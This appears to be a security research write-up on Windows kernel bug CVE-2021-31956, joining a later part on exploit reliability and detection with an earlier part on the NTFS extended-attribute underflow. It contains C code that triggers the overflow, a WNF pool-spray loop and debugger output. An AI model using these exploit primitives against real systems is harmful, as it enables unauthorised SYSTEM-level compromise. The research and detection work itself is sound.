Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the maximum number of overflow attempts. 32 was chosen as a semi-arbitrary value, based on empirical testing and on the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD'd the box on execution.

Unmapped Read – Number of times the relative read reached unmapped memory (ExpWnfReadStateData) – included in the BSODs on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result              Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells          85      82      76      75      75    78
Total LFH writes      708     726     707     678     624   688
Avg LFH writes          8       8       9       9       8     8
Failed after 32         1       3       2       1       1     2
BSODs on exec          14      15      22      24      24    20
Unmapped Read           4       5       8       6      10     7

Spray size 6000

Result              Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells          84      80      78      84      79    81
Total LFH writes      674     643     696     762     706   696
Avg LFH writes          8       8       9       9       8     8
Failed after 32         2       4       3       3       4     3
BSODs on exec          14      16      19      13      17    16
Unmapped Read           2       4       4       5       4     4

Spray size 10000

Result              Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells          84      85      87      85      86    85
Total LFH writes      805     714     761     688     694   732
Avg LFH writes          9       8       8       8       8     8
Failed after 32         3       5       3       3       3     3
BSODs on exec          13      10      10      12      11    11
Unmapped Read           1       0       1       1       0     1

Spray size 20000

Result              Run 1   Run 2   Run 3   Run 4   Run 5   Avg
SYSTEM shells          89      90      94      90      90    91
Total LFH writes      624     763     657     762     650   691
Avg LFH writes          7       8       7       8       7     7
Failed after 32         3       2       1       2       2     2
BSODs on exec           8       8       5       8       8     7
Unmapped Read           0       0       0       0       1     0

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that with the token stealing method there are more kernel reads/writes and a longer time window before PreviousMode is reverted.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result              Run 1   Run 2   Run 3   Run 4   Run 5   Avg
PRIV shells            94      92      93      92      89    92
Total LFH writes      939     825     825     788     724   820
Avg LFH writes          9       8       8       8       8     8
Failed after 32         2       2       1       2       0     1
BSODs on exec           4       6       6       6      11     6
Unmapped Read           0       1       1       2       2     1

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, a patch has been available for this vulnerability since the 8th of June 2021. If you're reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this, and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation detection techniques (token stealing etc.) which have been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or had chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events whilst loading a new tab and web page. I didn't explore too deeply whether there are any renderer operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF-based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through ETW logging of WNF operations did not seem feasible. This was expected, as the WNF subsystem is not intended for use by non-MS code.

Crash Dump Telemetry

Crash dumps are a very good way to detect unreliable exploitation techniques, or cases where an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. That one was found by looking for shellcode; however, certain crashes are pretty suspicious when they come from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes.

In the case of this specific vulnerability being exploited via WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation triggered by the WNF subsystem to fault accessing unmapped memory. Whilst this telemetry might lead to attack attempts being discovered before an attacker obtains code execution, once kernel code execution or SYSTEM has been gained they may simply disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios where this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve roughly a 90% success rate due to the techniques used. This seems to be about the limit of this approach without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and to detect memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.
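To make the arithmetic below easier to follow, here is a simplified model of the loop as just described. This is not the decompiled ntfs.sys code, just the same check expressed in C (using the _FILE_FULL_EA_INFORMATION structure mentioned above):

// Everything here is unsigned, so once out_buf_length has shrunk below the
// previous block's padding, out_buf_length - padding wraps around and an
// oversized block passes the check.
void QueryEaCheckModel(FILE_FULL_EA_INFORMATION *ea_block, ULONG out_buf_length)
{
    ULONG padding = 0;

    for (;;) {
        ULONG ea_block_size = 9 + ea_block->EaNameLength + ea_block->EaValueLength;

        if (ea_block_size > out_buf_length - padding)   // unsigned: can underflow
            break;

        // ... ea_block_size bytes are copied into the output buffer here ...

        out_buf_length -= ea_block_size + padding;
        padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;   // 4-byte alignment

        if (ea_block->NextEntryOffset == 0)
            break;
        ea_block = (FILE_FULL_EA_INFORMATION *)((char *)ea_block + ea_block->NextEntryOffset);
    }
}

The worked example which follows exercises exactly this logic.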

Putting some example numbers into this, let's assume the following: there are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where we have the following setup, with an out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

The resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

Since the arithmetic is unsigned, 0 - 2 wraps around to 0xFFFFFFFE, so the check passes and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call path reaches the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space, based on the size of the buffer. However, to trigger the vulnerability we need to cause the underflow described above.

In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.

Provided the first Ea Block requires padding, the second Ea Block will then be written out of bounds of the buffer when it is queried.

The interesting things about this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a "good" memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that the NextEntryOffset of the first EA block is set to the offset of the overflowing EA, including the padding (20). Then, for the overflowing EA block, the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block has the size we want our vulnerable buffer allocated with (minus the pool header), and the second extended attribute block contains the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow a copy of an attacker-controlled size.

So, in summary: once the extended attributes have been written to the file using NtSetEaFile, it is necessary to trigger the vulnerable code path to act on them by setting the output buffer size to be exactly the same size as our first extended attribute when calling NtQueryEaFile.
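A rough sketch of setting up and triggering the overflow: the EA names, buffer sizes and helper names are illustrative only, the NtSetEaFile/NtQueryEaFile prototypes follow the documented Zw versions and are resolved from ntdll at runtime, and windows.h/winternl.h are assumed to be included (with FILE_FULL_EA_INFORMATION defined as above):

typedef NTSTATUS (NTAPI *NtSetEaFile_t)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG);
typedef NTSTATUS (NTAPI *NtQueryEaFile_t)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG,
                                          BOOLEAN, PVOID, ULONG, PULONG, BOOLEAN);

typedef struct _FILE_GET_EA_INFORMATION {
    ULONG NextEntryOffset;
    UCHAR EaNameLength;
    CHAR  EaName[1];
} FILE_GET_EA_INFORMATION;

void TriggerOverflow(HANDLE file, USHORT first_value_len,
                     const unsigned char *overflow_data, USHORT overflow_len,
                     NtSetEaFile_t pNtSetEaFile, NtQueryEaFile_t pNtQueryEaFile)
{
    IO_STATUS_BLOCK iosb;
    unsigned char set_buf[0x2000] = { 0 };

    // First EA block: 9 + EaNameLength + EaValueLength must equal the Length we
    // later pass to NtQueryEaFile, and its padding must be non-zero.
    FILE_FULL_EA_INFORMATION *ea1 = (FILE_FULL_EA_INFORMATION *)set_buf;
    ea1->EaNameLength  = 5;
    ea1->EaValueLength = first_value_len;
    memcpy(ea1->EaName, "AAAAA", 6);

    ULONG ea1_size = 9 + ea1->EaNameLength + ea1->EaValueLength;
    ULONG padding  = ((ea1_size + 3) & 0xFFFFFFFC) - ea1_size;
    ea1->NextEntryOffset = ea1_size + padding;      // offset of the overflowing block

    // Second EA block: its value is the data which gets copied out of bounds.
    FILE_FULL_EA_INFORMATION *ea2 =
        (FILE_FULL_EA_INFORMATION *)(set_buf + ea1->NextEntryOffset);
    ea2->NextEntryOffset = 0;                       // end of the chain
    ea2->EaNameLength    = 5;
    ea2->EaValueLength   = overflow_len;
    memcpy(ea2->EaName, "BBBBB", 6);
    memcpy(ea2->EaName + 6, overflow_data, overflow_len);

    pNtSetEaFile(file, &iosb, set_buf,
                 ea1->NextEntryOffset + 9 + ea2->EaNameLength + ea2->EaValueLength);

    // Build the FILE_GET_EA_INFORMATION list naming both attributes so the query
    // goes down the NtfsQueryEaUserEaList path.
    unsigned char list_buf[0x40] = { 0 };
    FILE_GET_EA_INFORMATION *get1 = (FILE_GET_EA_INFORMATION *)list_buf;
    get1->EaNameLength    = 5;
    memcpy(get1->EaName, "AAAAA", 6);
    get1->NextEntryOffset = 12;                     // 4 + 1 + 5 + NUL, rounded up to 4 bytes

    FILE_GET_EA_INFORMATION *get2 = (FILE_GET_EA_INFORMATION *)(list_buf + 12);
    get2->EaNameLength    = 5;
    memcpy(get2->EaName, "BBBBB", 6);
    get2->NextEntryOffset = 0;

    // Output Length is exactly the size of the first block: the size check
    // underflows on the second block and the copy corrupts the adjacent chunk.
    unsigned char out[0x200];
    pNtQueryEaFile(file, &iosb, out, ea1_size, FALSE, list_buf, 12 + 11, NULL, TRUE);
}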

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows; however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes, bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this, which proposes some initial techniques. Without this paper having been published already, exploitation of this issue would have been significantly harder.

Firstly, the important thing to understand is where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We need to determine which of the four heap "backends" the chunk will be allocated from:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile Length parameter value of 0x12 from above, ending up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is because the size of the allocation is below 0x200, so it is serviced by the LFH.

We can step through the corruption of the adjacent chunk occurring by setting a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'"

and then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true; however, it demonstrates that even with more restrictive attacker constraints these can often be worked around, and that you should always try to fully understand the constraints of your bug before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that the chunk size calculation is 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.
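As a quick sanity check of that arithmetic (the 16-byte bucket granularity used below is an assumption that matches the rounding described above):

/* Illustrative only: how a 0x12-byte EA data length lands in a 0x30 LFH chunk. */
#include <stdio.h>

int main(void)
{
    unsigned int data_len    = 0x12;                    /* Length used with NtQueryEaFile */
    unsigned int pool_header = 0x10;                    /* sizeof(_POOL_HEADER) on x64    */
    unsigned int raw         = data_len + pool_header;  /* 0x22                            */
    unsigned int chunk       = (raw + 0xf) & ~0xfu;     /* 16-byte buckets -> 0x30         */
    printf("raw=0x%x chunk=0x%x\n", raw, chunk);
    return 0;
}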

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool; however, there has been less from a paged pool perspective. As this overflow occurs within the paged pool, we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the Length argument is our controlled size v6, with 16 added to account for the 0x10-byte _WNF_STATE_DATA header which is prepended to the data.

The allocator then adds a 0x10-byte _POOL_HEADER, so we have the following header:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);
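Wrapping these two calls in a loop gives a simple spray primitive. A rough sketch follows, assuming the NtCreateWnfStateName/NtUpdateWnfStateData prototypes and the WNF_STATE_NAME type are available from undocumented headers (e.g. phnt), and with psd being a valid security descriptor as above; a data size of 0x10 plus the two 0x10-byte headers lands each allocation in the 0x30 bucket shown below:

/* Sketch of a paged pool spray using the calls above; NUM_SPRAY is illustrative. */
#define NUM_SPRAY 0x2000

WNF_STATE_NAME states[NUM_SPRAY];
UCHAR          data[0x10];

void SprayWnf(PSECURITY_DESCRIPTOR psd)
{
    memset(data, 'A', sizeof(data));
    for (int i = 0; i < NUM_SPRAY; i++) {
        /* Each call pair creates a name instance and a _WNF_STATE_DATA allocation. */
        NtCreateWnfStateName(&states[i], WnfTemporaryStateName, WnfDataScopeMachine,
                             FALSE, 0, 0x1000, psd);
        NtUpdateWnfStateData(&states[i], data, sizeof(data), 0, 0, 0, 0);
    }
}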

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
